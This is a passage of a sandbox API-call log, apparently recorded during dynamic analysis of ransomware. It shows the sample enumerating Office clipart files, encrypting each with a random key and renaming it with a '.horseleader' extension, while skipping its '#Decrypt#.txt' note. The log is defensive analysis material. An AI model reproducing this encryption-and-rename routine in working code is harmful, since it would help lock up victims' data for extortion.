Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.995] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.995] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.997] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 67 [0253.997] StrStrW (lpFirst="DD01039_.WMF", lpSrch=".txt") returned 0x0 [0253.997] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=14820) returned 1 [0253.997] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x39e4, lpOverlapped=0x0) returned 1 [0254.000] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc61c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.001] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x39e4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x39e4, lpOverlapped=0x0) returned 1 [0254.001] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.001] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 
| out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.001] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.001] CloseHandle (hObject=0x158) returned 1 [0254.001] GetProcessHeap () returned 0x780000 [0254.001] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.001] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.horseleader") returned 79 [0254.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.horseleader")) returned 1 [0254.002] GetProcessHeap () returned 0x780000 [0254.002] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.002] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe6c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01138_.WMF", cAlternateFileName="")) returned 1 [0254.003] lstrcmpiW (lpString1="DD01138_.WMF", lpString2="Windows") returned -1 [0254.003] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 67 [0254.003] StrStrIW (lpFirst="DD01138_.WMF", lpSrch=".horseleader") returned 0x0 [0254.003] lstrcmpW (lpString1="DD01138_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.003] lstrcmpW (lpString1="DD01138_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.003] lstrlenW (lpString=".testttjffg") returned 11 [0254.004] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.004] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.004] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.004] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.005] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 67 [0254.005] StrStrW (lpFirst="DD01138_.WMF", lpSrch=".txt") returned 0x0 [0254.005] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3692) returned 1 [0254.005] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe6c, lpOverlapped=0x0) returned 1 [0254.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff194, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.007] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe6c, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe6c, lpOverlapped=0x0) returned 1 [0254.007] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.007] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.008] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.008] CloseHandle (hObject=0x158) returned 1 [0254.008] GetProcessHeap () returned 0x780000 [0254.008] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.008] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.horseleader") returned 79 [0254.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.horseleader")) returned 1 [0254.009] GetProcessHeap () returned 0x780000 [0254.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.009] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, 
ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe30, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01139_.WMF", cAlternateFileName="")) returned 1 [0254.009] lstrcmpiW (lpString1="DD01139_.WMF", lpString2="Windows") returned -1 [0254.009] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 67 [0254.009] StrStrIW (lpFirst="DD01139_.WMF", lpSrch=".horseleader") returned 0x0 [0254.009] lstrcmpW (lpString1="DD01139_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.009] lstrcmpW (lpString1="DD01139_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.009] lstrlenW (lpString=".testttjffg") returned 11 [0254.009] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.010] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.019] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF") returned 67 [0254.019] StrStrW (lpFirst="DD01139_.WMF", lpSrch=".txt") returned 0x0 [0254.019] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3632) returned 1 [0254.019] ReadFile (in: 
hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe30, lpOverlapped=0x0) returned 1 [0254.023] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff1d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.023] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe30, lpOverlapped=0x0) returned 1 [0254.023] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.088] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.089] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.089] CloseHandle (hObject=0x158) returned 1 [0254.089] GetProcessHeap () returned 0x780000 [0254.089] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.089] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.horseleader") returned 79 [0254.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.horseleader" (normalized: "c:\\program files\\microsoft 
office\\clipart\\pub60cor\\dd01139_.wmf.horseleader")) returned 1 [0254.090] GetProcessHeap () returned 0x780000 [0254.090] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.090] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01140_.WMF", cAlternateFileName="")) returned 1 [0254.090] lstrcmpiW (lpString1="DD01140_.WMF", lpString2="Windows") returned -1 [0254.090] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 67 [0254.091] StrStrIW (lpFirst="DD01140_.WMF", lpSrch=".horseleader") returned 0x0 [0254.091] lstrcmpW (lpString1="DD01140_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.091] lstrcmpW (lpString1="DD01140_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.091] lstrlenW (lpString=".testttjffg") returned 11 [0254.091] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.091] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.091] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.137] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 67 [0254.137] StrStrW (lpFirst="DD01140_.WMF", lpSrch=".txt") returned 0x0 [0254.137] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3616) returned 1 [0254.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xe20, lpOverlapped=0x0) returned 1 [0254.154] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff1e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.154] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xe20, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xe20, lpOverlapped=0x0) returned 1 [0254.154] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.155] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.155] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.155] CloseHandle (hObject=0x158) returned 1 [0254.155] GetProcessHeap () returned 0x780000 [0254.155] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.155] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.horseleader") returned 79 [0254.155] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01140_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01140_.wmf.horseleader")) returned 1 [0254.157] GetProcessHeap () returned 0x780000 [0254.158] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.158] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x85c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01143_.WMF", cAlternateFileName="")) returned 1 [0254.158] lstrcmpiW (lpString1="DD01143_.WMF", lpString2="Windows") returned -1 [0254.158] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 67 [0254.158] StrStrIW (lpFirst="DD01143_.WMF", lpSrch=".horseleader") returned 0x0 [0254.158] lstrcmpW (lpString1="DD01143_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.158] lstrcmpW (lpString1="DD01143_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.158] lstrlenW (lpString=".testttjffg") returned 11 [0254.158] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.159] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.159] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.159] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.160] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 67 [0254.160] StrStrW (lpFirst="DD01143_.WMF", lpSrch=".txt") returned 0x0 [0254.160] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2140) returned 1 [0254.160] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x85c, lpOverlapped=0x0) returned 1 [0254.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff7a4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.193] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x85c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x85c, lpOverlapped=0x0) returned 1 [0254.193] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.193] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.194] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.194] CloseHandle (hObject=0x158) returned 1 [0254.194] GetProcessHeap () returned 0x780000 [0254.194] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0254.194] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.horseleader") returned 79 [0254.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01143_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01143_.wmf.horseleader")) returned 1 [0254.196] GetProcessHeap () returned 0x780000 [0254.196] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0254.196] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xadc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD01145_.WMF", cAlternateFileName="")) returned 1 [0254.196] lstrcmpiW (lpString1="DD01145_.WMF", lpString2="Windows") returned -1 [0254.196] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 67 [0254.196] StrStrIW (lpFirst="DD01145_.WMF", lpSrch=".horseleader") returned 0x0 
[0254.196] lstrcmpW (lpString1="DD01145_.WMF", lpString2="#Decrypt#.txt") returned 1 [0254.196] lstrcmpW (lpString1="DD01145_.WMF", lpString2="_uninstalling_.png") returned 1 [0254.196] lstrlenW (lpString=".testttjffg") returned 11 [0254.196] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF", lpSrch=".testttjffg") returned 0x0 [0254.196] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0254.196] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0254.197] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0254.198] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 67 [0254.198] StrStrW (lpFirst="DD01145_.WMF", lpSrch=".txt") returned 0x0 [0254.198] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2780) returned 1 [0254.198] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xadc, lpOverlapped=0x0) returned 1 [0254.200] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff524, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0254.200] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xadc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xadc, lpOverlapped=0x0) returned 1 
[0254.200] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0254.200] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0254.201] CloseHandle (hObject=0x158) returned 1 [0254.201] GetProcessHeap () returned 0x780000 [0254.201] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 